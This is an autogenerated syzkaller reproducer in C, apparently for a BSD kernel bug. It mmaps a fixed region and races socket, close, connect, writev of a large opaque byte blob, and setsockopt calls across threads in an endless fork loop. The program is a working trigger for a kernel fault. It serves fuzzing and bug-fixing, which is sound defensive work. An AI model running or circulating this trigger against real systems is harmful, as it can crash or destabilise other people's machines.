// https://syzkaller.appspot.com/bug?id=80d1cf270e18a558257d0da390811641f78b5c01
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

static void kill_and_wait(int pid, int* status)
{
  kill(pid, SIGKILL);
  while (waitpid(-1, status, 0) != pid) {
  }
}

static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void thread_start(void* (*fn)(void*), void* arg)
{
  pthread_t th;
  pthread_attr_t attr;
  pthread_attr_init(&attr);
  pthread_attr_setstacksize(&attr, 128 << 10);
  if (pthread_create(&th, &attr, fn, arg))
    exit(1);
  pthread_attr_destroy(&attr);
}

typedef struct {
  pthread_mutex_t mu;
  pthread_cond_t cv;
  int state;
} event_t;

static void event_init(event_t* ev)
{
  if (pthread_mutex_init(&ev->mu, 0))
    exit(1);
  if (pthread_cond_init(&ev->cv, 0))
    exit(1);
  ev->state = 0;
}

static void event_reset(event_t* ev)
{
  ev->state = 0;
}

static void event_set(event_t* ev)
{
  pthread_mutex_lock(&ev->mu);
  if (ev->state)
    exit(1);
  ev->state = 1;
  pthread_mutex_unlock(&ev->mu);
  pthread_cond_broadcast(&ev->cv);
}

static void event_wait(event_t* ev)
{
  pthread_mutex_lock(&ev->mu);
  while (!ev->state)
    pthread_cond_wait(&ev->cv, &ev->mu);
  pthread_mutex_unlock(&ev->mu);
}

static int event_isset(event_t* ev)
{
  pthread_mutex_lock(&ev->mu);
  int res = ev->state;
  pthread_mutex_unlock(&ev->mu);
  return res;
}

static int event_timedwait(event_t* ev, uint64_t timeout)
{
  uint64_t start = current_time_ms();
  uint64_t now = start;
  pthread_mutex_lock(&ev->mu);
  for (;;) {
    if (ev->state)
      break;
    uint64_t remain = timeout - (now - start);
    struct timespec ts;
    ts.tv_sec = remain / 1000;
    ts.tv_nsec = (remain % 1000) * 1000 * 1000;
    pthread_cond_timedwait(&ev->cv, &ev->mu, &ts);
    now = current_time_ms();
    if (now - start > timeout)
      break;
  }
  int res = ev->state;
  pthread_mutex_unlock(&ev->mu);
  return res;
}

#define __syscall syscall

struct thread_t {
  int created, call;
  event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
static int running;

static void* thr(void* arg)
{
  struct thread_t* th = (struct thread_t*)arg;
  for (;;) {
    event_wait(&th->ready);
    event_reset(&th->ready);
    execute_call(th->call);
    __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
    event_set(&th->done);
  }
  return 0;
}

static void execute_one(void)
{
  int i, call, thread;
  int collide = 0;
again:
  for (call = 0; call < 6; call++) {
    for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0]));
         thread++) {
      struct thread_t* th = &threads[thread];
      if (!th->created) {
        th->created = 1;
        event_init(&th->ready);
        event_init(&th->done);
        event_set(&th->done);
        thread_start(thr, th);
      }
      if (!event_isset(&th->done))
        continue;
      event_reset(&th->done);
      th->call = call;
      __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
      event_set(&th->ready);
      if (collide && (call % 2) == 0)
        break;
      event_timedwait(&th->done, 45);
      break;
    }
  }
  for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
    sleep_ms(1);
  if (!collide) {
    collide = 1;
    goto again;
  }
}

static void execute_one(void);

#define WAIT_FLAGS 0

static void loop(void)
{
  int iter;
  for (iter = 0;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      sleep_ms(1);
      if (current_time_ms() - start < 5 * 1000)
        continue;
      kill_and_wait(pid, &status);
      break;
    }
  }
}

uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

void execute_call(int call)
{
  long res;
  switch (call) {
  case 0:
    res = syscall(SYS_socket, 0x10000000011, 0x8000000003, 0);
    if (res != -1)
      r[0] = res;
    break;
  case 1:
    syscall(SYS_close, r[0]);
    break;
  case 2:
    res = syscall(SYS_socket, 2, 2, 0);
    if (res != -1)
      r[1] = res;
    break;
  case 3:
    *(uint16_t*)0x20000000 = 0x282;
    memcpy((void*)0x20000002, "./file0\x00", 8);
    syscall(SYS_connect, r[1], 0x20000000, 0x10);
    break;
  case 4:
    *(uint64_t*)0x20001640 = 0x200016c0;
    memcpy(
        (void*)0x200016c0,
        "\x74\x00\x80\x85\x6c\xd5\xe3\xd4\x28\x4b\xb2\xef\x37\xfa\xee\xdf\xdb"
        "\x81\x94\x18\xe8\x99\xf0\xdd\x2d\x7d\xac\x38\x60\xb0\x24\x74\x19\xdf"
        "\x60\xf9\x43\x36\x1c\x63\x36\xe0\xdf\xb8\xff\xe2\x51\x81\x21\xcb\x7c"
        "\x03\x4c\xb8\x14\xae\xc2\xad\x3d\xf9\x38\x56\xbc\xb9\x2f\x48\x14\xbb"
        "\x36\x5f\xf3\x9b\xd3\x63\x55\x98\xa9\x28\xd5\xb9\xcf\xf4\x08\x8c\xa3"
        "\x6f\xc7\x44\x2d\xf2\x74\xca\x12\x76\xcb\x2c\x92\x71\x63\xb4\xe0\x66"
        "\xdb\x48\x63\x33\x78\xa4\x0b\x5b\x1b\x4a\x51\xda\xdf\xea\xfe\xc0\xe5"
        "\x40\x5c\x43\x6a\x32\x08\x23\xff\x0c\x88\x3b\xa3\xdd\x05\x90\xfb\x3e"
        "\xcf\x99\xe2\x6b\x9b\xde\x71\xe8\x0e\xdd\x04\xf0\x7e\x3b\x8b\x3b\x27"
        "\x1a\x69\xab\x23\xad\x2a\x16\x67\x6d\xc1\xbf\xc0\xae\x34\x5b\x0c\xcc"
        "\x03\xb2\x15\xa8\xd4\xf5\x58\xf1\xff\x07\xc2\x07\xee\x86\xae\xdc\x44"
        "\x24\xa5\xa1\xe8\x30\xff\xcf\x4f\x22\x9f\x1f\xfe\x75\xa1\x76\xde\x3d"
        "\xc1\x66\x83\x57\xc4\x41\x64\x57\xf7\x01\x03\x98\xfe\xc8\x4d\xa1\xb2"
        "\x6c\xd6\x40\xc9\x59\x05\x11\xe3\x60\xa5\x1a\x8b\xc4\xef\x9a\x55\x78"
        "\xe1\xa8\x13\x46\x8c\xdc\xc5\x6c\x85\xf0\x18\x30\xc5\x06\x49\xa2\x57"
        "\xad\x8d\x20\xac\xbf\xcc\x95\x2d\xd8\x6a\x16\xc8\xdf\x9f\xb5\xd0\x74"
        "\xb6\x2b\xb8\x6e\xb4\xa2\x12\xcb\xda\x50\xd1\x95\x20\x29\x5d\x72\xd3"
        "\x3f\x6b\xb6\xbc\x4e\x7d\xcb\xc9\x05\xe3\x80\xb3\x16\x2f\xc7\x83\xde"
        "\x4f\x52\xf8\x1e\x8e\x40\xb8\x0f\x7c\x2d\x94\xbd\x47\xcc\x61\x6c\xb1"
        "\xb2\x86\xdd\x51\x02\x6b\xac\xd2\xe8\xcc\x7b\xf7\x5b\x2c\x50\xcd\x3e"
        "\xfb\xf6\x94\x2c\xa1\x51\xfa\x47\xb4\x49\x7e\xef\x37\x18\x51\xb0\xce"
        "\x03\xaf\x8c\x8a\x41\x05\xb7\x8f\xa9\x58\xfb\x06\x1c\x19\xcb\x66\x41"
        "\x8b\xbe\x55\x1b\x1c\xbd\x39\x2f\xbe\x56\x0e\x0c\x93\x7a\x97\xb4\xd1"
        "\xc5\x1e\x1e\xb5\xd0\xe4\xf0\xba\x72\xb4\xd0\x16\x5b\xed\x50\x2a\x33"
        "\xe3\x04\x34\x81\x5e\x4b\xa8\xee\xdf\x58\x72\x01\x7c\x4c\xec\xe7\xcf"
        "\x8f\x8b\x81\x88\xbe\x0f\xfe\xe1\x13\x81\xba\x4c\x33\x5f\x0d\xd0\xc6"
        "\x3d\x8f\xb1\xa7\x84\xc7\xb3\x0e\x77\xb3\xbb\x5d\x14\xbb\xc4\x08\xb7"
        "\xb5\xcc\x93\xeb\x0e\x3a\x93\xd2\xd1\xab\x5d\x45\x1f\xe7\xd7\x23\xe7"
        "\x68\xc1\xba\x81\x0f\xd6\x4a\x7a\x06\xf3\xc9\x1f\xa8\x9a\x2b\xf5\x4d"
        "\xd2\xdc\x0c\x93\x0f\x78\x94\x7e\xcc\x15\xe7\x99\xf9\x82\x65\x34\x2a"
        "\x69\x4c\x4a\x27\xf9\xd4\x2a\xd6\x85\x32\xee\xe1\x69\x0d\x69\x26\xbb"
        "\xa4\x46\x9a\xec\xd5\x03\xac\x03\x57\xb1\x61\x7a\x03\x9b\x7c\xe4\xed"
        "\x98\x9c\xe6\x4d\xc8\xc7\xee\x5a\x82\x68\x01\xa9\xda\x81\x44\x95\x5b"
        "\x5c\x44\x34\x37\x95\xbb\x93\x84\x74\x18\xc9\x72\x2d\xb5\xcf\xe8\x42"
        "\x89\x1d\x50\xf1\x8b\x19\x3f\xb6\xde\x1c\x20\x8e\x94\x0d\x7b\xa5\x16"
        "\x83\x70\x3c\x42\x43\x14\x35\x16\x4b\x88\xd0\x17\x6c\x5b\xac\xd6\x39"
        "\x13\xdf\xcb\xbc\x77\x53\x41\x31\x41\xa3\x28\x59\x71\xcc\x31\x39\x49"
        "\xbf\xe1\xdd\x0a\x36\x7a\x65\x67\xb4\x1e\x71\xda\x67\x15\x5c\x01\x83"
        "\xa4\xc1\x9e\x34\xd4\x1b\x9f\x8b\xb1\xe0\x21\x8a\x0f\xdf\x33\xab\x62"
        "\x94\x72\x5c\x17\xed\x26\xa0\xa9\xe9\xba\xc8\x8b\x4d\xbb\xe1\xeb\xfe"
        "\x96\x38\x9c\xde\xaa\x33\x04\x77\xe3\xe8\xe4\x15\x71\x44\x90\x19\xd9"
        "\x43\x5a\x9d\xf7\x53\xea\xa2\x70\x44\xc8\x61\x20\x27\x7b\xc3\x40\x49"
        "\x6a\x48\xeb\xcc\xf2\xd6\xa2\x92\xf8\x76\x73\xa0\x9e\x70\xfe\x2e\x3a"
        "\xbf\xd8\xcb\x9f\x73\x49\xde\x70\xd7\x61\xa6\x9b\x15\xb9\xc9\x42\xbe"
        "\xc6\xda\xa9\xc8\x5f\x14\xc6\xc9\xb6\x92\x2f\xf0\x3a\x12\x45\x4f\xa3"
        "\x78\xe8\x43\x7a\x55\xce\x39\x43\xb2\x27\x21\xb3\x9c\xac\x97\x0e\x08"
        "\x1f\xc1\x3e\x49\x2e\xbc\xdb\x18\x5c\x33\x0f\x32\x05\x0e\xae\x52\x57"
        "\xba\x73\x96\xbc\x8b\xf5\x02\x21\xa5\xcd\x8f\x9e\x3b\x6a\x1f\xd3\xa9"
        "\x2f\xfd\xf3\xde\x4f\xcb\x5f\xec\x23\xcf\x09\xb4\x16\xb1\xc2\x0d\xee"
        "\x60\x6e\x28\x94\xdc\xaf\x47\x58\x73\x0e\x6d\x42\x53\xd6\xc9\x15\x75"
        "\x1e\x4e\x8a\xd5\xe1\xa4\x4a\x05\xbd\x27\xbf\x77\x3c\x22\x2e\x27\x65"
        "\xe3\x19\x9d\x14\xad\x5a\xdc\x14\xb5\x01\x59\x45\xcd\x97\x13\x1b\x8b"
        "\xdc\x26\xab\xa5\x0c\x49\xe9\x61\x5a\x9f\x16\xfc\x99\xdd\x83\xee\x88"
        "\xc7\x8a\xaa\xe2\xed\xb7\x2d\x7c\x97\x7c\xa2\x50\x2a\xba\x0e\x7b\x90"
        "\xc3\x5c\xd0\x1b\x61\x68\xd8\xe7\x57\x12\x4c\xd3\x3d\x96\xbd\x84\xae"
        "\xce\x40\x44\x45\xe4\x69\x1e\xfb\xd6\x3a\x88\x06\x87\x44\x50\x0d\x8d"
        "\x4f\x90\x80\x51\x27\x28\x23\x3c\x90\x34\x98\xb3\x18\x21\xd0\x1a\x5b"
        "\xde\xfb\xe9\x47\x50\x4e\xf0\xbf\x89\x0f\x2f\xa2\xab\xe6\xd0\xde\x5d"
        "\x06\xa4\x78\xaa\x23\x00\xe2\x35\x0d\x90\x2a\x44\x65\xbc\x8f\xb3\xfe"
        "\x1f\xaf\x93\x3e\x53\x44\x60\x3a\x5e\x27\x8c\xd9\x7e\x19\xed\x4b\xa1"
        "\x0a\x6e\xc9\x89\x21\xd1\x15\x43\x15\xa2\x79\xfe\x7f\xc5\x93\xce\x0d"
        "\xb2\x76\xca\x57\xfc\x10\x1b\x6c\xa3\xbf\xf8\xe8\xf1\x2c\x5d\x3f\x92"
        "\xd0\xd3\xd0\xb5\xfd\xea\x19\xf0\xd3\x20\x3b\xc6\xe8\xd2\xa2\x9a\x60"
        "\x91\x4d\x45\x67\x68\xe9\x3b\x22\x09\x7c\xf1\x77\x07\xfd\x24\xa0\xe3"
        "\x7f\x79\x77\xfa\xd2\x18\xeb\x07\x87\x4f\xc5\x57\x86\xf2\xbe\x56\x1d"
        "\x67\xf5\xec\xf4\xaa\xc4\x48\x40\xda\xd9\x42\x98\xab\xa0\x20\xf0\x0e"
        "\x49\x48\x24\x10\x08\xd0\x85\xb3\x12\x27\x4d\x7a\x1c\x82\xbc\x1b\xfd"
        "\x68\x8f\x1d\xf5\xc6\x0e\xd4\xe0\xb0\x32\xe5\x46\xdd\x6a\x7e\x61\xe4"
        "\x52\xca\x81\x2d\x0d\x0e\xf3\xc3\xe2\x9f\x34\x71\x58\xdd\x11\xba\x83"
        "\x43\x5b\x0e\x1e\xfb\xb7\x29\x5b\x32\x66\x65\xe4\xd9\x48\x0a\xff\x06"
        "\xaa\x03\x13\xaf\x38\x81\xf7\x6d\xf5\xd2\xb8\x63\x57\xad\xd2\xff\xc8"
        "\xc2\x03\x56\x90\xcd\xb5\x80\x8a\x57\x83\x10\xc2\x1a\x67\x0f\x0d\x85"
        "\xe0\x90\xc2\xc2\xf4\x50\x82\x95\x09\xc1\x6e\xe1\x72\xf9\xfe\xda\x51"
        "\xd5\x44\x63\x9e\x65\xc2\x29\x58\xd4\xe5\x11\xb2\x47\x6d\x85\x05\xb2"
        "\x79\xa6\x2f\x29\x8b\x44\x8b\xf1\x15\x40\x3b\x8c\xd8\xd8\x19\xa7\xa1"
        "\x25\xbf\x59\x7c\xf9\x1c\xd0\xae\xf6\x3f\x13\x8a\x6f\xb7\xb5\xcc\xf6"
        "\xd5\x0f\xe6\xad\x71\x05\xe7\x87\x87\xa5\xbc\x53\x42\xd9\x63\x8b\x21"
        "\xf8\x55\xe6\x0f\x20\x5e\x30\x43\xe8\x66\x00\x41\x53\x3a\x17\x2a\x31"
        "\x68\x72\x66\xc8\x2b\x70\x8b\xb8\x60\xd2\x4f\x76\x86\xc0\x9e\x41\x0d"
        "\xa9\x70\xbe\x1d\xc9\x0f\x85\x50\xdb\xd3\xbf\xaf\x3e\xe2\xa6\xed\xff"
        "\xf7\x45\x43\x2e\x8c\x01\x09\x26\x19\xcc\x9e\x68\xcf\x6f\x36\x39\xac"
        "\xeb\xa0\x39\x9f\x1c\xcc\x78\xe4\xed\x72\xe7\x4b\xb8\x6d\xde\x6a\x1f"
        "\xcb\x25\x61\x81\x44\x17\x02\x8b\xc2\xc1\x79\xa5\x35\x90\x18\x79\xa7"
        "\xf2\x6b\xb1\xc2\xc3\x55\xad\x10\x4a\xcf\x05\x8e\x75\xdb\x5d\x5c\xb0"
        "\xb0\xb1\xb6\xa4\xfd\x17\xc2\x09\x75\xa5\xac\x23\xd2\xc6\x05\xa6\x97"
        "\x32\x8a\xb3\x82\x2c\x68\xf9\x7d\x31\xfb\x7c\xda\x03\x28\xd2\xe0\xe1"
        "\xab\xf4\x08\xd1\xd6\xf7\xf9\x33\x8f\x23\xfa\x1d\x46\x70\x4b\xe6\xac"
        "\x22\x9f\x18\x0c\x91\x27\xfa\x4e\x22\x6b\x9f\x9c\x9e\x41\x12\xb5\x1a"
        "\xcf\xc9\xf2\x1d\x61\x0b\x4c\x1c\x72\x8c\xb0\xf6\xa9\xfd\xa4\xe0\xc8"
        "\x08\x02\xc1\xfa\x1a\x08\x12\x53\x12\xe3\x60\xa2\x75\xa4\x3e\xa0\x67"
        "\x1b\x51\x8e\x87\x3c\xd7\x18\xc8\x87\xd2\xc5\xe9\x5a\x19\x1c\x5e\x8b"
        "\x0a\x44\xbb\x30\xb7\x81\x23\x57\xf2\x46\x4d\xa0\xd9\x00\x38\x07\xf4"
        "\x1e\xf9\x4c\x76\xe1\x0a\xb9\xff\xa8\x58\xc0\x17\x31\x3d\xc3\xab\xdb"
        "\x70\xe9\x14\x70\x1e\x4f\x01\xdc\x29\xb9\x45\x5d\x47\xf8\xb3\xc1\x4d"
        "\x32\x4a\xa8\x73\x59\x56\xb5\xf0\x74\xf0\x86\x4e\x96\x35\x53\xdc\x95"
        "\x52\x0a\xaa\x1c\x44\x55\xe8\x03\x69\xc9\x1e\x60\xba\xac\xac\x30\x0e"
        "\xd1\x0d\x89\x58\xd1\x06\xff\x88\xec\xad\x9b\xac\x1b\x46\x39\x8e\x35"
        "\xbc\x06\x0c\xdc\x5f\x14\xb4\x69\x10\x4a\xb2\x79\x1b\x8b\x3d\x94\x67"
        "\x09\xe4\x15\x34\xa2\x80\xde\xea\x5e\x64\x5b\xd9\x37\x83\xd6\x80\xe1"
        "\x90\x2e\x8d\xba\x3f\xb4\xcd\xb5\x0d\x6f\x70\xe8\x0e\xef\x52\x58\x2e"
        "\xc8\x9c\xb9\x3d\xf3\xc2\x6e\x49\xfc\x33\xfb\xc9\x8a\xc7\xb3\xfa\x50"
        "\x5b\x7b\xcb\x8e\x5b\x6f\x01\xa5\x1d\x51\xeb\x8b\x24\x4c\x4c\xe2\xe8"
        "\xb1\x30\xa8\x1b\xf8\x24\x72\x15\xb6\x4b\x3e\xf7\x86\xd5\x8d\x40\xac"
        "\xbb\xf7\x7f\xc8\x3f\x77\x6e\xd8\xb8\xa0\xcc\x83\xee\x68\xc2\x40\xc3"
        "\x28\xc2\x8d\xd5\xbc\x96\x7c\xa5\xf9\x83\x47\x33\x39\x04\x0c\xc2\xdb"
        "\x7f\x31\x5e\xf3\x61\x7f\xec\xec\x9b\x1c\xe2\x67\x4c\x79\xb7\xed\xd9"
        "\xe9\x13\xbf\x83\x59\xf4\x3a\x6f\x75\x59\xd2\x8d\xac\x5e\x70\xac\x2c"
        "\x41\x8a\xce\x13\xb3\xc7\x44\x3d\xbe\x02\x54\xd2\x81\x6a\xc3\xfb\xfb"
        "\x45\xa1\x8e\x56\x38\x50\xec\x2b\xf9\xa6\x33\x11\xec\x75\xa0\x61\x11"
        "\x9d\x99\x41\xe9\x55\x30\x01\x48\x49\xae\xbe\xf8\xd6\xee\x28\xdc\x4c"
        "\x91\xbd\x3c\xbd\xb3\x94\xe3\x8e\xc9\x8e\x97\x27\x74\x56\x8f\xd0\xd6"
        "\xb1\x22\xb8\xa0\x5c\x58\xdf\x58\xbb\x1f\x96\x15\x35\xca\x92\x59\xa2"
        "\x14\xb8\x94\x10\xfe\x8d\x59\x41\x62\x4f\x38\xbc\xa4\x70\x2d\x48\xae"
        "\x93\xec\x49\xf4\x42\x5f\x56\x08\xa4\x28\x74\xe3\xe2\x8e\xf1\x06\xc0"
        "\xd7\x94\x9d\x76\x07\xf1\xf6\x64\xab\xfc\xa6\x69\x83\xa7\x41\xf3\x4a"
        "\xf0",
        1956);
    *(uint64_t*)0x20001648 = 0x7a4;
    syscall(SYS_writev, r[1], 0x20001640, 1);
    break;
  case 5:
    *(uint32_t*)0x200000c0 = 2;
    syscall(SYS_setsockopt, r[0], 0xffff, 0x2000, 0x200000c0, 4);
    break;
  }
}
int main(void)
{
  syscall(SYS_mmap, 0x20000000, 0x1000000, 3, 0x1012, -1, 0, 0);
  loop();
  return 0;
}